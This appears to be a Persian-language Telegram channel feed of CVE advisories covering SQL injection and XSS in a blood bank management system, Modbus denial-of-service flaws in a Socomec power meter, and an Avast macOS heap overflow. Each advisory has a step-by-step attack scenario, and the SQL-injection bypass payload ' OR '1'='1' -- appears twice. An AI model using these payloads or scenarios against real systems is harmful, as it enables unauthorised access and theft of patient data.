اصلی‌ترین پیامد این آسیب‌پذیری، دور زدن کامل سیستم احراز هویت است.

مهاجم می‌تواند بدون نیاز به نام کاربری و رمز عبور معتبر، به پنل مدیریت یا بخش‌های حساس سیستم دسترسی غیرمجاز پیدا کند. این دسترسی می‌تواند منجر به سرقت، تغییر یا حذف اطلاعات حساس بیماران، اهداکنندگان و سوابق پزشکی ذخیره‌شده در سیستم شود.

---

🎯 سناریوی حمله:

۱. مهاجم به صفحه ورود سیستم (receiverLogin.php) مراجعه می‌کند.

۲. در فیلد ایمیل یا رمز عبور، به جای اطلاعات واقعی، یک قطعه کد SQL مخرب مانند ' OR '1'='1' -- وارد می‌کند.

۳. سرور این ورودی را بدون پاکسازی در کوئری پایگاه داده قرار می‌دهد. کوئری نهایی چیزی شبیه به SELECT * FROM users WHERE remail = '' OR '1'='1' -- ' AND rpassword = '...' خواهد بود.

۴. شرط '1'='1' همیشه درست (True) ارزیابی می‌شود و باعث می‌شود پایگاه داده اولین رکورد کاربر را بازگردانده و سیستم به اشتباه تصور کند که احراز هویت موفقیت‌آمیز بوده است. در نتیجه، مهاجم با سطح دسترسی کاربر قربانی به سیستم وارد می‌شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2024-48882

🟠 Risk Level: HIGH (Score: 8.6)

گزارش تحلیل آسیب‌پذیری: CVE-2024-48882
عنوان: منع سرویس در تجهیزات Socomec DIRIS Digiware M-70

📄 شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع «منع سرویس» (Denial of Service) در عملکرد پروتکل Modbus TCP دستگاه Socomec DIRIS Digiware M-70 با نسخه 1.6.9 شناسایی شده است. این ضعف امنیتی به مهاجم اجازه می‌دهد تا با ارسال یک بسته شبکه خاص و دستکاری‌شده، عملکرد دستگاه را متوقف کند.

💥 تأثیر:
یک مهاجم بدون نیاز به احراز هویت (Unauthenticated) می‌تواند با ارسال یک بسته مخرب به دستگاه هدف، باعث از کار افتادن و عدم پاسخگویی کامل آن شود. این حمله منجر به یک وضعیت منع سرویس (DoS) شده و می‌تواند عملیات‌های حیاتی مانیتورینگ و کنترل صنعتی که به این تجهیز وابسته هستند را مختل سازد.

🎭 سناریوی حمله:
مهاجمی که به شبکه محلی دستگاه آسیب‌پذیر دسترسی دارد، یک بسته Modbus TCP با ساختار نامعتبر را به پورت مربوطه ارسال می‌کند. سفت‌افزار (Firmware) دستگاه قادر به پردازش صحیح این بسته غیرمنتظره نبوده و دچار کرش (Crash) یا هنگ (Freeze) می‌شود. در این حالت، دستگاه تا زمان راه‌اندازی مجدد دستی (Manual Reboot) از دسترس خارج خواهد شد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-23417

🟠 Risk Level: HIGH (Score: 8.6)

🛡️ توضیحات آسیب‌پذیری:
یک آسیب‌پذیری از نوع "ممانعت از سرویس" (Denial of Service - DoS) با شناسه CVE-2025-23417 در دستگاه Socomec DIRIS Digiware M-70 با فریمور نسخه 1.6.9 شناسایی شده است.

این ضعف امنیتی در نحوه پردازش بسته‌های شبکه مربوط به پروتکل Modbus RTU over TCP وجود دارد. یک مهاجم می‌تواند با ارسال یک بسته شبکه با ساختار خاص و دستکاری‌شده (Specially Crafted Packet)، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.

مهم‌ترین نکته این است که بهره‌برداری از این آسیب‌پذیری نیازی به احراز هویت ندارد و مهاجم می‌تواند از راه دور حمله را اجرا کند.


💥 تأثیرات:
تأثیر اصلی این آسیب‌پذیری، ایجاد وضعیت ممانعت از سرویس (Denial of Service) است.

در صورت بهره‌برداری موفق، دستگاه هدف از کار افتاده و دیگر به درخواست‌های شبکه پاسخ نخواهد داد. این امر منجر به موارد زیر می‌شود:
- قطع نظارت و مانیتورینگ بر سیستم‌های متصل.
- از دست رفتن داده‌های عملیاتی در لحظه.
- نیاز به راه‌اندازی مجدد (Reboot) دستی دستگاه برای بازگرداندن سرویس به حالت عادی.


🎯 سناریوی حمله:
یک مهاجم با دسترسی به شبکه (داخلی یا از طریق اینترنت در صورت عدم وجود فایروال مناسب)، دستگاه آسیب‌پذیر DIRIS Digiware M-70 را شناسایی می‌کند.

سپس، مهاجم یک بسته شبکه Modbus مخرب و غیراستاندارد را ایجاد کرده و آن را به صورت احراز هویت نشده به پورت سرویس‌دهنده دستگاه ارسال می‌کند.

به محض دریافت و پردازش این بسته، سرویس مربوطه در دستگاه دچار اختلال شده و از کار می‌افتد (Crash). در نتیجه، دستگاه تا زمان راه‌اندازی مجدد، از دسترس خارج می‌شود و ارتباط خود را با سیستم‌های مدیریتی از دست می‌دهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-26858

🟠 Risk Level: HIGH (Score: 8.6)

تحلیل آسیب‌پذیری CVE-2025-26858
---

شرح آسیب‌پذیری:

یک آسیب‌پذیری از نوع سرریز بافر (Buffer Overflow) در بخش عملکرد پروتکل Modbus TCP دستگاه Socomec DIRIS Digiware M-70 با فریم‌ور نسخه 1.6.9 شناسایی شده است. این ضعف امنیتی به یک مهاجم اجازه می‌دهد تا با ارسال بسته‌های شبکه که به صورت خاص دستکاری شده‌اند، باعث سرریز شدن حافظه موقت (بافر) در دستگاه هدف شود.

تأثیر:

تأثیر اصلی این آسیب‌پذیری، ممانعت از سرویس (Denial of Service) است. بهره‌برداری موفق از این حفره امنیتی منجر به از کار افتادن کامل دستگاه یا سرویس Modbus TCP آن می‌شود. در نتیجه، دستگاه دیگر قادر به پاسخگویی به درخواست‌های شبکه نخواهد بود که این امر می‌تواند باعث اختلال جدی در عملیات نظارت و کنترل در محیط‌های صنعتی (ICS) گردد. این حمله بدون نیاز به هیچ‌گونه احراز هویت قابل اجرا است.

سناریوی حمله:

۱. شناسایی: مهاجم یک دستگاه آسیب‌پذیر Socomec DIRIS Digiware M-70 را در شبکه شناسایی می‌کند.

۲. ارسال بسته‌ها: مهاجم بدون نیاز به لاگین، مجموعه‌ای از بسته‌های Modbus TCP دستکاری‌شده و مخرب را به سمت پورت مربوطه در دستگاه هدف ارسال می‌کند.

۳. بهره‌برداری: دستگاه به دلیل عدم اعتبارسنجی صحیح حجم داده‌های ورودی، قادر به مدیریت بسته‌های دریافتی نیست و وضعیت سرریز بافر رخ می‌دهد.

۴. نتیجه: سرویس Modbus TCP دستگاه کرش کرده و از دسترس خارج می‌شود. برای بازگرداندن دستگاه به حالت عادی، به راه‌اندازی مجدد (Reboot) دستی نیاز خواهد بود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-55221

🟠 Risk Level: HIGH (Score: 8.6)

تحلیل آسیب‌پذیری | CVE-2025-55221

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع منع سرویس (Denial of Service) با شناسه CVE-2025-55221 در دستگاه Socomec DIRIS Digiware M-70 با نسخه فریمور 1.6.9 شناسایی شده است. این ضعف امنیتی در عملکرد پروتکل‌های Modbus TCP و Modbus RTU over TCP USB وجود دارد.

این آسیب‌پذیری با ارسال یک بسته شبکه‌ی مخرب و دستکاری‌شده به پورت 502 (مربوط به Modbus TCP) فعال می‌شود. نکته حائز اهمیت این است که مهاجم برای اجرای این حمله نیازی به هیچ‌گونه احراز هویت ندارد و صرفاً دسترسی به شبکه دستگاه کافی است.

تأثیر:
موفقیت‌آمیز بودن این حمله منجر به از کار افتادن کامل دستگاه (Denial of Service) می‌شود. در نتیجه، تمام فرآیندهای نظارتی و کنترلی که به این دستگاه وابسته هستند، متوقف شده و باعث اختلال جدی در عملیات صنعتی یا زیرساختی می‌گردد. این امر می‌تواند منجر به از دست رفتن داده‌های مانیتورینگ و قطع ارتباط مدیریتی با دستگاه شود.

سناریوی حمله:
یک مهاجم غیرمجاز (unauthenticated) که به شبکه دستگاه دسترسی دارد، یک دستگاه آسیب‌پذیر Socomec DIRIS Digiware M-70 را شناسایی می‌کند. سپس، یک بسته شبکه‌ی خاص و مخرب برای پروتکل Modbus TCP می‌سازد و آن را به پورت 502 دستگاه هدف ارسال می‌کند.

دستگاه به دلیل عدم توانایی در پردازش صحیح این بسته نامتعارف، دچار اختلال عملکردی شده و سرویس‌دهی آن به طور کامل متوقف می‌شود و از دسترس خارج می‌گردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63532

🔴 Risk Level: CRITICAL (Score: 9.6)

🚨 تحلیل آسیب‌پذیری: CVE-2025-63532

گزارش تحلیل یک آسیب‌پذیری از نوع تزریق SQL در سیستم مدیریت بانک خون.

---

🔎 توضیحات آسیب‌پذیری:
یک آسیب‌پذیری از نوع تزریق SQL (SQL Injection) در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی در کامپوننت cancel.php وجود دارد.

مشکل اصلی این است که برنامه، ورودی‌های دریافتی از کاربر (به‌طور مشخص در فیلد جستجو) را به درستی اعتبارسنجی و پاکسازی (Sanitize) نمی‌کند. این نقص به مهاجم اجازه می‌دهد تا با ارسال کدهای SQL مخرب، ساختار کوئری‌های پایگاه داده را دستکاری کرده و دستورات دلخواه خود را اجرا کند.

⚠️ تأثیرات:
مهاجمی که از این آسیب‌پذیری بهره‌برداری کند، قادر خواهد بود:

- مکانیزم ورود و احراز هویت را دور بزند و بدون نیاز به نام کاربری و رمز عبور، به پنل مدیریت دسترسی پیدا کند.
- اطلاعات حساس پایگاه داده، مانند اطلاعات اهداکنندگان و بیماران را سرقت کند.
- داده‌های موجود در سیستم را تغییر داده یا حذف کند.
- در موارد حاد، کنترل کامل پایگاه داده و حتی سرور را به دست بگیرد.

🎯 سناریوی حمله:
یک مهاجم می‌تواند سناریوی زیر را اجرا کند:

۱. مهاجم به صفحه cancel.php که دارای یک فیلد جستجوی آسیب‌پذیر است، مراجعه می‌کند.

۲. به جای وارد کردن یک عبارت جستجوی عادی، یک payload مخرب SQL مانند ' OR '1'='1' -- را در فیلد جستجو وارد می‌کند.

۳. سرور این ورودی را بدون پاکسازی، مستقیماً در کوئری SQL خود قرار می‌دهد. شرط '1'='1' که همیشه درست است، باعث می‌شود سیستم احراز هویت را نادیده بگیرد.

۴. در نتیجه، مهاجم بدون نیاز به اطلاعات کاربری معتبر، به بخش‌های حساس سیستم که نیاز به لاگین دارند، دسترسی پیدا می‌کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63533

🟠 Risk Level: HIGH (Score: 8.5)

تحلیل آسیب‌پذیری CVE-2025-63533

---

شرح آسیب‌پذیری:

یک آسیب‌پذیری از نوع Cross-Site Scripting (XSS) در «سیستم مدیریت بانک خون نسخه ۱.۰» شناسایی شده است. این ضعف امنیتی در کامپوننت‌های updateprofile.php و rprofile.php وجود دارد.

برنامه ورودی‌های کاربر را به درستی پاکسازی (Sanitize) یا کدگذاری (Encode) نمی‌کند و به مهاجم اجازه می‌دهد تا کدهای مخرب جاوا اسکریپت را در پارامترهایی مانند rname، remail، rpassword و ... تزریق کند. این کدها هنگام مشاهده صفحه توسط قربانی، در مرورگر او اجرا می‌شوند.


تأثیر:

مهاجم با بهره‌برداری از این آسیب‌پذیری می‌تواند اقدامات مخرب زیر را در مرورگر کاربر قربانی انجام دهد:

- سرقت کوکی‌ها و اطلاعات نشست (Session Hijacking)
- تغییر ظاهر صفحه برای اجرای حملات فیشینگ
- ریدایرکت کردن کاربر به وب‌سایت‌های مخرب
- دسترسی به اطلاعات حساس کاربر که در صفحه نمایش داده می‌شود
- اجرای کدهای دلخواه در بستر مرورگر قربانی


سناریوی حمله:

۱. مهاجم یک کد مخرب جاوا اسکریپت (Payload) را آماده می‌کند. برای مثال، کدی که کوکی نشست کاربر را سرقت کرده و به سرور مهاجم ارسال می‌کند.

۲. مهاجم وارد بخش ویرایش پروفایل کاربری خود در سیستم شده و در یکی از فیلدهای آسیب‌پذیر مانند rname (نام)، کد مخرب خود را به جای نام واقعی وارد و پروفایل را ذخیره می‌کند.

۳. مدیر سیستم یا کاربر دیگری برای مشاهده پروفایل مهاجم به صفحه مربوطه مراجعه می‌کند.

۴. سرور، اطلاعات پروفایل مهاجم (شامل کد مخرب) را از پایگاه داده بازیابی کرده و بدون پاکسازی، در صفحه قربانی نمایش می‌دهد.

۵. کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، کوکی نشست او را سرقت می‌کند و به سرور تحت کنترل مهاجم ارسال می‌نماید. مهاجم اکنون می‌تواند با استفاده از این کوکی، به حساب کاربری قربانی دسترسی پیدا کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63535

🔴 Risk Level: CRITICAL (Score: 9.6)

🔬 توضیحات آسیب‌پذیری:

آسیب‌پذیری از نوع تزریق SQL (SQL Injection) با شناسه CVE-2025-63535 در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی در کامپوننت abs.php وجود دارد و دلیل آن، عدم اعتبارسنجی و پاکسازی صحیح ورودی‌های دریافتی از کاربر در کوئری‌های دیتابیس است.

💥 تأثیرات:

یک مهاجم می‌تواند با بهره‌برداری از این آسیب‌پذیری، مکانیزم احراز هویت را دور زده و دسترسی غیرمجاز به سیستم پیدا کند. این دسترسی می‌تواند منجر به موارد زیر شود:
- مشاهده، تغییر یا حذف اطلاعات حساس (مانند سوابق اهداکنندگان خون و بیماران)
- اجرای دستورات دلخواه بر روی پایگاه داده
- به خطر افتادن کامل محرمانگی، یکپارچگی و در دسترس بودن داده‌ها

🎭 سناریوی حمله:

مهاجم با ارسال یک درخواست دستکاری‌شده به فایل abs.php، در فیلد جستجوی مربوطه، به جای یک عبارت عادی، یک قطعه کد SQL مخرب تزریق می‌کند. برای مثال، کدی که نتیجه‌ی شرط لاگین را همیشه TRUE برمی‌گرداند.

از آنجایی که برنامه این ورودی را پاکسازی نمی‌کند، کد مخرب مستقیماً در کوئری دیتابیس اجرا شده و باعث می‌شود سیستم، مهاجم را به عنوان یک کاربر معتبر شناسایی کند. در نتیجه، مهاجم بدون نیاز به نام کاربری و رمز عبور، به پنل مدیریتی یا بخش‌های حساس سیستم دسترسی پیدا می‌کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-10101

🟠 Risk Level: HIGH (Score: 8.1)

تحلیل آسیب‌پذیری | CVE-2025-10101
نرم‌افزار: Avast Antivirus on MacOS

📄 Vulnerability Description:
یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر هیپ (Heap-based Buffer Overflow) و نوشتن خارج از محدوده (Out-of-bounds Write) در آنتی‌ویروس Avast بر روی سیستم‌عامل macOS شناسایی شده است.

این ضعف امنیتی زمانی فعال می‌شود که آنتی‌ویروس یک فایل دستکاری‌شده با فرمت Mach-O (فرمت فایل‌های اجرایی macOS) را پردازش کند. نسخه‌های نرم‌افزار قبل از 3.9.2025 تحت تأثیر این آسیب‌پذیری قرار دارند.

💥 Impact:
مهاجمی که موفق به بهره‌برداری از این آسیب‌پذیری شود، می‌تواند به دو شکل به سیستم آسیب برساند. اول، امکان اجرای کد محلی (Local Code Execution) وجود دارد که به مهاجم اجازه می‌دهد با سطح دسترسی آنتی‌ویروس، کدهای مخرب را بر روی سیستم قربانی اجرا کند.

دوم، حمله می‌تواند منجر به ممانعت از سرویس (Denial of Service) شود. در این حالت، آنتی‌ویروس به طور کامل از کار افتاده و سیستم بدون هیچ‌گونه حفاظت امنیتی در برابر تهدیدات دیگر رها می‌شود.

👣 Scenario:
یک سناریوی حمله محتمل به این صورت است که مهاجم ابتدا یک فایل Mach-O مخرب ایجاد می‌کند که به طور خاص برای فعال‌سازی آسیب‌پذیری سرریز بافر طراحی شده است.

سپس، این فایل از طریق روش‌های مهندسی اجتماعی مانند یک پیوست ایمیل فیشینگ یا لینک دانلود به سیستم قربانی (که از نسخه آسیب‌پذیر Avast در macOS استفاده می‌کند) تحویل داده می‌شود.

به محض اینکه آنتی‌ویروس Avast اقدام به اسکن این فایل می‌کند، چه به صورت خودکار در پس‌زمینه و چه به صورت دستی توسط کاربر، کد آسیب‌پذیر در نرم‌افزار فعال می‌شود. این امر منجر به از کار افتادن آنتی‌ویروس یا اجرای دستورات مخرب مهاجم بر روی سیستم می‌گردد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal